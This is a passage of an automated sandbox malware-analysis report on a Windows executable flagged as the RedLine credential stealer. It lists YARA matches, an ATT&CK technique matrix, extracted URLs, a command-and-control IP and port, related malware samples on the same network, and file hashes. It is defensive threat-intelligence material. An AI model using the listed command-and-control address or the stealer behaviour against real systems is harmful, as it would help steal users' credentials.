            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_004123F1 SetUnhandledExceptionFilter,0_2_004123F1
            Source: C:\Users\user\Desktop\Implosions.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeCode function: GetLocaleInfoA,0_2_00417A20
            Source: C:\Users\user\Desktop\Implosions.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_00412A15 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00412A15
            Source: C:\Users\user\Desktop\Implosions.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected RedLine Stealer
            Source: Yara matchFile source: 0.2.Implosions.exe.34e0190.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Implosions.exe.2280f6e.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Implosions.exe.2280086.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Implosions.exe.50a0000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Implosions.exe.2480ee8.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Implosions.exe.2480000.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Implosions.exe.2480ee8.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Implosions.exe.2280086.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Implosions.exe.2480000.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Implosions.exe.34c6458.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Implosions.exe.50a0000.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.Implosions.exe.71b718.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Implosions.exe.34e0190.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Implosions.exe.34c6458.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.Implosions.exe.71b718.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Implosions.exe.2280f6e.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Implosions.exe.34c5570.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Implosions.exe.34c5570.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.2911359259.00000000050A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2910650053.0000000002480000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2911153997.00000000034C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2910554766.0000000002240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.1668569005.000000000071B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Implosions.exe PID: 7544, type: MEMORYSTR
            Source: Yara matchFile source: 0.2.Implosions.exe.34e0190.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Implosions.exe.2280f6e.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Implosions.exe.2280086.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Implosions.exe.50a0000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Implosions.exe.2480ee8.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Implosions.exe.2480000.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Implosions.exe.2480ee8.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Implosions.exe.2280086.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Implosions.exe.2480000.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Implosions.exe.34c6458.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Implosions.exe.50a0000.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.Implosions.exe.71b718.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Implosions.exe.34e0190.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Implosions.exe.34c6458.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.Implosions.exe.71b718.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Implosions.exe.2280f6e.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Implosions.exe.34c5570.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Implosions.exe.34c5570.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.2911359259.00000000050A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2910650053.0000000002480000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2911153997.00000000034C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2910554766.0000000002240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.1668569005.000000000071B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Implosions.exe PID: 7544, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected RedLine Stealer
            Source: Yara matchFile source: 0.2.Implosions.exe.34e0190.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Implosions.exe.2280f6e.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Implosions.exe.2280086.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Implosions.exe.50a0000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Implosions.exe.2480ee8.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Implosions.exe.2480000.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Implosions.exe.2480ee8.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Implosions.exe.2280086.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Implosions.exe.2480000.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Implosions.exe.34c6458.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Implosions.exe.50a0000.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.Implosions.exe.71b718.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Implosions.exe.34e0190.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Implosions.exe.34c6458.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.Implosions.exe.71b718.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Implosions.exe.2280f6e.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Implosions.exe.34c5570.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Implosions.exe.34c5570.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.2911359259.00000000050A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2910650053.0000000002480000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2911153997.00000000034C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2910554766.0000000002240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.1668569005.000000000071B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Implosions.exe PID: 7544, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
            Command and Scripting Interpreter            		1
            DLL Side-Loading            		1
            Process Injection            		2
            Virtualization/Sandbox Evasion            		OS Credential Dumping1
            System Time Discovery            		Remote Services1
            Archive Collected Data            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts2
            Native API            		Boot or Logon Initialization Scripts1
            DLL Side-Loading            		1
            Disable or Modify Tools            		LSASS Memory31
            Security Software Discovery            		Remote Desktop ProtocolData from Removable Media11
            Non-Standard Port            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
            Process Injection            		Security Account Manager2
            Virtualization/Sandbox Evasion            		SMB/Windows Admin SharesData from Network Shared Drive1
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Deobfuscate/Decode Files or Information            		NTDS1
            Process Discovery            		Distributed Component Object ModelInput Capture11
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
            Obfuscated Files or Information            		LSA Secrets23
            System Information Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading            		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Implosions.exe71%ReversingLabsByteCode-MSIL.Ransomware.RedLine
            Implosions.exe53%VirustotalBrowse
            Implosions.exe100%AviraHEUR/AGEN.1323343
            Implosions.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://ipinfo.io/ip%appdata%0%URL Reputationsafe
            https://ipinfo.io/ip%appdata%0%URL Reputationsafe
            http://tempuri.org/Endpoint/CheckConnectResponse0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX0%URL Reputationsafe
            https://api.ip.sb/geoip%USERPEnvironmentROFILE%0%URL Reputationsafe
            http://tempuri.org/Endpoint/CheckConnect0%URL Reputationsafe
            http://tempuri.org/Endpoint/VerifyUpdateResponse0%URL Reputationsafe
            http://tempuri.org/Endpoint/SetEnvironmentResponse0%URL Reputationsafe
            https://api.ipify.orgcookies//settinString.Removeg0%URL Reputationsafe
            http://tempuri.org/Endpoint/GetUpdatesResponse0%URL Reputationsafe
            http://tempuri.org/Endpoint/EnvironmentSettingsResponse0%URL Reputationsafe
            http://tempuri.org/00%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            http://tempuri.org/0%Avira URL Cloudsafe
            http://tempuri.org/Endpoint/CheckConnectLR0%Avira URL Cloudsafe
            http://109.234.38.212:6677/0%Avira URL Cloudsafe
            http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous0%Avira URL Cloudsafe
            http://schemas.xmlsoap.org/soap/envelope/0%Avira URL Cloudsafe
            http://tempuri.org/Endpoint/EnvironmentSettingsLR0%Avira URL Cloudsafe
            http://tempuri.org/Endpoint/SetEnvironmentLR0%Avira URL Cloudsafe
            http://109.234.38.212:6677/4%VirustotalBrowse
            http://schemas.xmlsoap.org/soap/envelope/0%VirustotalBrowse
            http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous0%VirustotalBrowse
            109.234.38.212:66770%Avira URL Cloudsafe
            http://tempuri.org/Endpoint/SetEnvironmentLR2%VirustotalBrowse
            http://schemas.xmlsoap.org/ws/2004/08/addressing0%Avira URL Cloudsafe
            http://tempuri.org/Endpoint/GetUpdatesLR0%Avira URL Cloudsafe
            109.234.38.212:66774%VirustotalBrowse
            http://tempuri.org/1%VirustotalBrowse
            http://tempuri.org/Endpoint/CheckConnectLR2%VirustotalBrowse
            http://tempuri.org/Endpoint/VerifyUpdateLR0%Avira URL Cloudsafe
            http://tempuri.org/Endpoint/0%Avira URL Cloudsafe
            http://tempuri.org/Endpoint/EnvironmentSettingsLR2%VirustotalBrowse
            http://tempuri.org/Endpoint/CheckConnectT0%Avira URL Cloudsafe
            http://109.234.38.212:66770%Avira URL Cloudsafe
            http://schemas.xmlsoap.org/soap/actor/next0%Avira URL Cloudsafe
            http://schemas.xmlsoap.org/ws/2004/08/addressing0%VirustotalBrowse
            http://tempuri.org/Endpoint/1%VirustotalBrowse
            http://tempuri.org/Endpoint/CheckConnectT2%VirustotalBrowse
            http://schemas.xmlsoap.org/soap/actor/next0%VirustotalBrowse
            http://tempuri.org/Endpoint/VerifyUpdateLR2%VirustotalBrowse
            http://109.234.38.212:66774%VirustotalBrowse
            http://tempuri.org/Endpoint/GetUpdatesLR2%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            No contacted domains info

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://109.234.38.212:6677/true
            • 4%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            109.234.38.212:6677true
            • 4%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://ipinfo.io/ip%appdata%Implosions.exe, 00000000.00000002.2910650053.0000000002480000.00000004.08000000.00040000.00000000.sdmp, Implosions.exe, 00000000.00000002.2911359259.00000000050A0000.00000004.08000000.00040000.00000000.sdmp, Implosions.exe, 00000000.00000002.2911153997.00000000034C5000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910554766.0000000002240000.00000004.00000020.00020000.00000000.sdmp, Implosions.exe, 00000000.00000003.1668569005.000000000071B000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            		unknown
            http://tempuri.org/Endpoint/CheckConnectLRImplosions.exe, 00000000.00000002.2910742497.00000000025A1000.00000004.00000800.00020000.00000000.sdmpfalse
            • 2%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousImplosions.exe, 00000000.00000002.2910742497.00000000024C1000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://tempuri.org/Endpoint/CheckConnectResponseImplosions.exe, 00000000.00000002.2910742497.000000000268C000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.00000000024C1000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.0000000002577000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.00000000025A1000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://schemas.xmlsoap.org/ws/2004/08/addressing/faultXImplosions.exe, 00000000.00000002.2910742497.00000000024C1000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://api.ip.sb/geoip%USERPEnvironmentROFILE%Implosions.exe, 00000000.00000002.2910650053.0000000002480000.00000004.08000000.00040000.00000000.sdmp, Implosions.exe, 00000000.00000002.2911359259.00000000050A0000.00000004.08000000.00040000.00000000.sdmp, Implosions.exe, 00000000.00000002.2911153997.00000000034C5000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910554766.0000000002240000.00000004.00000020.00020000.00000000.sdmp, Implosions.exe, 00000000.00000003.1668569005.000000000071B000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://schemas.xmlsoap.org/soap/envelope/Implosions.exe, 00000000.00000002.2910742497.000000000256E000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.000000000268C000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.00000000024C1000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.0000000002577000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.00000000025A1000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://tempuri.org/Implosions.exe, 00000000.00000002.2910742497.000000000256E000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.000000000268C000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.00000000024C1000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.0000000002577000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.00000000025A1000.00000004.00000800.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://tempuri.org/Endpoint/CheckConnectImplosions.exe, 00000000.00000002.2910742497.00000000025A1000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://tempuri.org/Endpoint/EnvironmentSettingsLRImplosions.exe, 00000000.00000002.2910742497.00000000025A1000.00000004.00000800.00020000.00000000.sdmpfalse
            • 2%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://tempuri.org/Endpoint/VerifyUpdateResponseImplosions.exe, 00000000.00000002.2910742497.000000000268C000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.00000000024C1000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.0000000002577000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.00000000025A1000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://tempuri.org/Endpoint/SetEnvironmentResponseImplosions.exe, 00000000.00000002.2910742497.000000000268C000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.00000000024C1000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.0000000002577000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.00000000025A1000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://tempuri.org/Endpoint/SetEnvironmentLRImplosions.exe, 00000000.00000002.2910742497.00000000025A1000.00000004.00000800.00020000.00000000.sdmpfalse
            • 2%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://api.ipify.orgcookies//settinString.RemovegImplosions.exe, 00000000.00000002.2910650053.0000000002480000.00000004.08000000.00040000.00000000.sdmp, Implosions.exe, 00000000.00000002.2911359259.00000000050A0000.00000004.08000000.00040000.00000000.sdmp, Implosions.exe, 00000000.00000002.2911153997.00000000034C5000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910554766.0000000002240000.00000004.00000020.00020000.00000000.sdmp, Implosions.exe, 00000000.00000003.1668569005.000000000071B000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://schemas.xmlsoap.org/ws/2004/08/addressingImplosions.exe, 00000000.00000002.2910742497.00000000024C1000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://tempuri.org/Endpoint/GetUpdatesLRImplosions.exe, 00000000.00000002.2910742497.00000000025A1000.00000004.00000800.00020000.00000000.sdmpfalse
            • 2%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://tempuri.org/Endpoint/VerifyUpdateLRImplosions.exe, 00000000.00000002.2910742497.00000000025A1000.00000004.00000800.00020000.00000000.sdmpfalse
            • 2%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://tempuri.org/Endpoint/GetUpdatesResponseImplosions.exe, 00000000.00000002.2910742497.000000000268C000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.00000000024C1000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.0000000002577000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.00000000025A1000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://tempuri.org/Endpoint/Implosions.exe, 00000000.00000002.2910742497.00000000025A1000.00000004.00000800.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://tempuri.org/Endpoint/EnvironmentSettingsResponseImplosions.exe, 00000000.00000002.2910742497.000000000268C000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.00000000024C1000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.0000000002577000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.00000000025A1000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://tempuri.org/Endpoint/CheckConnectTImplosions.exe, 00000000.00000002.2910742497.000000000255A000.00000004.00000800.00020000.00000000.sdmpfalse
            • 2%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://tempuri.org/0Implosions.exe, 00000000.00000002.2910742497.000000000256E000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameImplosions.exe, 00000000.00000002.2910742497.000000000255A000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://109.234.38.212:6677Implosions.exe, 00000000.00000002.2910742497.000000000255A000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.000000000268C000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.0000000002577000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.00000000025A1000.00000004.00000800.00020000.00000000.sdmpfalse
            • 4%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://schemas.xmlsoap.org/soap/actor/nextImplosions.exe, 00000000.00000002.2910742497.00000000024C1000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown

            World Map of Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public IPs

            IPDomainCountryFlagASNASN NameMalicious
            109.234.38.212
            		unknownRussian Federation
            		48282VDSINA-ASRUtrue

            General Information

            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1505369
            Start date and time:2024-09-06 06:36:05 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 4m 57s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:7
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:Implosions.exe
            Detection:MAL
            Classification:mal100.troj.winEXE@2/0@0/1
            EGA Information:
            • Successful, ratio: 100%
            HCA Information:
            • Successful, ratio: 99%
            • Number of executed functions: 256
            • Number of non-executed functions: 34
            Cookbook Comments:
            • Found application associated with file extension: .exe

            Warnings

            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
            • Not all processes where analyzed, report is missing behavior information
            • Report size getting too big, too many NtQueryValueKey calls found.
            • Report size getting too big, too many NtReadVirtualMemory calls found.

            Simulations

            Behavior and APIs

            No simulations

            Joe Sandbox View / Context

            IPs

            No context

            Domains

            No context

            ASNs

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            VDSINA-ASRUaisuru.arm.elfGet hashmaliciousUnknownBrowse
            • 94.103.83.102
            PQ2AUndsdb.exeGet hashmaliciousAmadey, AsyncRAT, Cryptbot, PureLog Stealer, RedLine, SmokeLoader, StealcBrowse
            • 62.113.117.95
            SecuriteInfo.com.Win32.PWSX-gen.663.14886.exeGet hashmaliciousXRed, XWormBrowse
            • 62.113.117.95
            SecuriteInfo.com.BackDoor.AsyncRATNET.1.5719.7945.exeGet hashmaliciousAsyncRAT, VenomRATBrowse
            • 62.113.117.95
            ExeFile (88).exeGet hashmaliciousRedLineBrowse
            • 94.103.86.184
            SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dllGet hashmaliciousGO BackdoorBrowse
            • 94.103.90.9
            SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dllGet hashmaliciousGO BackdoorBrowse
            • 94.103.90.9
            SecuriteInfo.com.Win32.Malware-gen.26009.9463.exeGet hashmaliciousGO BackdoorBrowse
            • 195.2.70.38
            mips.elfGet hashmaliciousUnknownBrowse
            • 94.103.91.233
            Notepad3_v6.23.203.2.exeGet hashmaliciousAmadey, GO BackdoorBrowse
            • 195.2.70.38

            JA3 Fingerprints

            No context

            Dropped Files

            No context

            Created / dropped Files

            No created / dropped files found

            Static File Info

            General

            File type:PE32 executable (console) Intel 80386, for MS Windows
            Entropy (8bit):7.193904084712107
            TrID:
            • Win32 Executable (generic) a (10002005/4) 99.96%
            • Generic Win/DOS Executable (2004/3) 0.02%
            • DOS Executable Generic (2002/1) 0.02%
            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
            File name:Implosions.exe
            File size:187'904 bytes
            MD5:aeed85e8a5b1d2013ea6fa0348e954d7
            SHA1:899fc5632fce363d0dd1f05bb388f0f3f27240c2
            SHA256:5b1d458a558dbe702742407f213b8a38241555bbded345b0f7c46529b938b3a3
            SHA512:1e81577e9ad438d213f0f229711d0426344582c14637e76250497926af9b4261fc0fa63697321a20255fa3b6895b605589c6641304888b8fdbfc78bfd3d8a677
            SSDEEP:3072:RDKW1LgppLRHMY0TBfJvjcTp5Xew7T79dLTrpMu6:RDKW1Lgbdl0TBBvjc/ew/79Do
            TLSH:4E04AE117181C1B3C4B7117044E6CB7A9E7A30720B6A96D7B7DD2BBA6E213D1A3362CD
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......h..-,q.~,q.~,q.~2#.~?q.~...~+q.~,q.~\q.~2#n~.q.~2#i~.q.~2#{~-q.~Rich,q.~........................PE..L...t..P..........#........

            File Icon

            Icon Hash:90cececece8e8eb0

            Static PE Info

            General

            Entrypoint:0x40cd2f
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x400000
            Subsystem:windows cui
            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            DLL Characteristics:TERMINAL_SERVER_AWARE
